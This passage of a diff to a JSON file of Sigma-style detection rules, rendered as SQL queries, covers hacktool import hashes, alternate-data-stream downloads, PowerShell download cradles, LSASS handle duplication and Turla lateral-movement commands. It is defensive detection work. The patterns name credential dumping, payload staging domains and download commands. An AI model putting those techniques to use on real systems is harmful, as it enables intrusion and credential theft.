'%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE 
'%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2019_1378.yml" + "filename": "create_stream_hash_hacktool_download.yml" }, { - "title": "Regasm/Regsvcs Suspicious Execution", - "id": "cc368ed0-2411-45dc-a222-510ace303cb2", + "title": "Creation Of a Suspicious ADS File Outside a Browser Download", + "id": "573df571-a223-43bc-846e-3f98da481eca", "status": "experimental", - "description": "Detects 
suspicious execution of Regasm/Regsvcs utilities", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.009" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Other legitimate browsers not currently included in the filter (please add them)", + "Legitimate downloads via scripting or command-line tools (Investigate to determine if it's legitimate)" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((NewProcessName LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" + "SELECT * FROM logs WHERE ((Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND (TargetFilename LIKE '%.exe%' ESCAPE '\\' OR TargetFilename LIKE '%.scr%' ESCAPE '\\' OR TargetFilename LIKE 
'%.bat%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd%' ESCAPE '\\' OR TargetFilename LIKE '%.docx%' ESCAPE '\\' OR TargetFilename LIKE '%.hta%' ESCAPE '\\' OR TargetFilename LIKE '%.jse%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk%' ESCAPE '\\' OR TargetFilename LIKE '%.pptx%' ESCAPE '\\' OR TargetFilename LIKE '%.ps%' ESCAPE '\\' OR TargetFilename LIKE '%.reg%' ESCAPE '\\' OR TargetFilename LIKE '%.sct%' ESCAPE '\\' OR TargetFilename LIKE '%.vb%' ESCAPE '\\' OR TargetFilename LIKE '%.wsc%' ESCAPE '\\' OR TargetFilename LIKE '%.wsf%' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_regasm.yml" + "filename": "create_stream_hash_creation_internet_file.yml" }, { - "title": "Suspect Svchost Activity", - "id": "16c37b52-b141-42a5-a3ea-bbe098444397", + "title": "Potential Suspicious Winget Package Installation", + "id": "a3f5c081-e75b-43a0-9f5b-51f26fe5dba2", "status": "experimental", - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space.", - "author": "David Burkett, @signalblur", + "description": "Detects potential suspicious winget package installation from a suspicious source.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.persistence" ], "falsepositives": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. 
https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnetp.exe' ESCAPE '\\') OR CommandLine = ''))" + "SELECT * FROM logs WHERE (Contents LIKE '[ZoneTransfer] ZoneId=3%' ESCAPE '\\' AND (Contents LIKE '%://1%' ESCAPE '\\' OR Contents LIKE '%://2%' ESCAPE '\\' OR Contents LIKE '%://3%' ESCAPE '\\' OR Contents LIKE '%://4%' ESCAPE '\\' OR Contents LIKE '%://5%' ESCAPE '\\' OR Contents LIKE '%://6%' ESCAPE '\\' OR Contents LIKE '%://7%' ESCAPE '\\' OR Contents LIKE '%://8%' ESCAPE '\\' OR Contents LIKE '%://9%' ESCAPE '\\') AND TargetFilename LIKE '%:Zone.Identifier' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\WinGet\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_execution_with_no_cli_flags.yml" + "filename": "create_stream_hash_winget_susp_package_source.yml" }, { - "title": "PUA - Nimgrab Execution", - "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", + "title": "Suspicious File Download From File Sharing Websites", + "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", "status": "experimental", - "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", - "author": "frack113", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate use of Nim on a developer systems" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE 
((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" + "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' 
ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nimgrab.yml" + "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" }, { - "title": "PowerShell Web Download", - "id": "6e897651-f157-4d8f-aaeb-df8151488385", - "status": "experimental", - "description": "Detects suspicious ways to download files or content using PowerShell", - "author": "Florian Roth (Nextron Systems)", + "title": "Exports Registry Key To an Alternate Data Stream", + "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", + "status": "test", + "description": "Exports the target Registry key and hides it in the specified alternate data stream.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ], "falsepositives": [ - "Scripts or tools that download files" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" ], - "filename": "proc_creation_win_powershell_download_cradles.yml" + "filename": "create_stream_hash_regedit_export_to_ads.yml" }, { - "title": "DLL Execution via Rasautou.exe", - "id": "cd3d1298-eb3b-476c-ac67-12847de55813", - "status": "test", - "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", - "author": "Julia Fomina, oscd.community", + "title": "Unusual File Download From File Sharing Websites", + "id": "ae02ed70-11aa-4a22-b397-c0d0e8f6ea99", + "status": "experimental", + "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ 
"attack.defense_evasion", - "attack.t1218" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((Contents LIKE '%transfer.sh%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" + "filename": "create_stream_hash_file_sharing_domains_download_unusual_extension.yml" }, { - "title": "Renamed MegaSync Execution", - "id": "643bdcac-8b82-49f4-9fd9-25a90b929f3b", - "status": "test", - "description": "Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, 
Sodinokibi, Pysa, and Conti.", - "author": "Sittikorn S", + "title": "Unusual File Download from Direct IP Address", + "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "status": "experimental", + "description": "Detects the download of suspicious file type from URLs with IP", + "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1564.004" ], "falsepositives": [ - "Software that illegally integrates MegaSync in a renamed form", - "Administrators that have renamed MegaSync" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'megasync.exe' AND NOT (NewProcessName LIKE '%\\\\megasync.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_megasync.yml" + "filename": "create_stream_hash_susp_ip_domains.yml" }, { - "title": "Application Whitelisting Bypass via Bginfo", - "id": "aaf46cdc-934e-4284-b329-34aa701e3771", + "title": "Hidden Executable In NTFS Alternate Data Stream", + "id": "b69888d4-380c-45ce-9cf9-d9ce46e67821", "status": "test", - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "author": "Beyu Denis, oscd.community", + "description": "Detects the creation of an ADS (Alternate Data Stream) that 
contains an executable (non-empty imphash)", + "author": "Florian Roth (Nextron Systems), @0xrawsec", "tags": [ - "attack.execution", - "attack.t1059.005", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.s0139", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\bginfo.exe' ESCAPE '\\' AND CommandLine LIKE '%/popup%' ESCAPE '\\' AND CommandLine LIKE '%/nolicprompt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Hash LIKE '%IMPHASH=%' ESCAPE '\\' AND NOT (Hash LIKE '%IMPHASH=00000000000000000000000000000000%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_bginfo.yml" + "filename": "create_stream_hash_ads_executable.yml" }, { - "title": "Suspicious Extrac32 Alternate Data Stream Execution", - "id": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", - "status": "test", - "description": "Extract data from cab file and hide it in an alternate data stream", - "author": "frack113", + "title": "HandleKatz Duplicating LSASS Handle", + "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", + "status": "experimental", + "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", + "author": "Bhabesh Raj (rule), @thefLinkk", "tags": [ + "attack.execution", + "attack.t1106", "attack.defense_evasion", - "attack.t1564.004" + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%extrac32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_extrac32_ads.yml" + "filename": "proc_access_win_handlekatz_lsass_access.yml" }, { - "title": "Turla Group Lateral Movement", - "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", - "status": "test", - "description": "Detects automated lateral movement by Turla group", - "author": "Markus Neis", + "title": "Direct Syscall of NtOpenProcess", + "id": "3f3f3506-1895-401b-9cc3-e86b16e630d0", + "status": "experimental", + "description": "Detects the usage of the direct syscall of NtOpenProcess which might be done from a CobaltStrike BOF.", + "author": "Christian Burkard (Nextron Systems), Tim Shelton", "tags": [ - "attack.g0010", "attack.execution", - "attack.t1059", - "attack.lateral_movement", - "attack.t1021.002", - "attack.discovery", - "attack.t1083", - "attack.t1135" + "attack.t1106" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE 'net use \\\\\\\\\\%DomainController\\%\\\\C$ \"P@ssw0rd\" %' ESCAPE '\\' OR CommandLine LIKE 'dir c:\\\\%.doc% /s' ESCAPE '\\' OR CommandLine LIKE 'dir \\%TEMP\\%\\\\%.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (CallTrace LIKE 'UNKNOWN%' ESCAPE '\\' AND NOT ((TargetImage LIKE 'C:\\\\Program Files\\\\Cylance\\\\Desktop\\\\CylanceUI.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeUpdate\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MicrosoftEdgeUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\' AND SourceImage LIKE '%vcredist\\_x64.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\systeminfo.exe' ESCAPE '\\' AND SourceImage LIKE '%setup64.exe' ESCAPE '\\') OR (TargetImage LIKE 
'%AmazonSSMAgentSetup.exe' ESCAPE '\\' AND SourceImage LIKE '%AmazonSSMAgentSetup.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\') OR (TargetImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\' AND SourceImage LIKE '%C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe' ESCAPE '\\') OR (TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Program Files (x86)\\\\CCleaner Browser\\\\Application\\\\CCleanerBrowser.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\Discord.exe' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\AUDIODG.EXE' ESCAPE '\\') OR (SourceImage LIKE 